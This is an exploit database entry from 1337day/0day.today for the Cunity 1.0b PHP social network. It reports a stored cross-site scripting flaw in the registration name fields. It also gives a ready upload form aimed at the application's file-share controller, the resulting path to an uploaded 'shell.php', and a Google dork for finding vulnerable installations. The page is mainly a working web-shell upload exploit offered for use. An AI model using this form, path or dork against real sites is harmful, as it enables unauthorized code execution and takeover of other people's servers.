Cunity 1.0b - XSS/FileUpload Vulnerabilities

2013-03-25T00:00:00
ID 1337DAY-ID-20563
Type zdt
Reporter DaOne
Modified 2013-03-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Cunity 1.0b - XSS/FileUpload Vulnerabilities
# Date: 2013-03-24
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Vendor Homepage: http://www.cunity.net/
# Software Link: http://sourceforge.net/projects/cunity/files/
# Category: webapps/php
# Version: 1.0beta
# Tested on: Apache(CentOS) PHP/5.2.17
# Google dork: "Powered by CUNITY"
##########################################

1-XSS 
Cunity contains a flaw that allows a remote cross-site scripting (XSS) attack
This flaw exists because the application does not validate the 'firstname, lastname' parameter in Registration
script code would execute in members.php and profile.php?user=

2-File Upload
<form action="http://{host}/Cunity-V1.0b/controllers/ajaxFileShareController.php" method="post" enctype="multipart/form-data" >
<input type="file" name="fu">
<input type="submit" value="Upload"></form>
>>http://{host}/Cunity-V1.0b/files/_files/user/shell.php<<
note: file upload vulnerability exists only if Filesharing Module <Setting>[Filepath] is correct /home/user/www/Cunity-V1.0b/files/

#  0day.today [2018-04-12]  #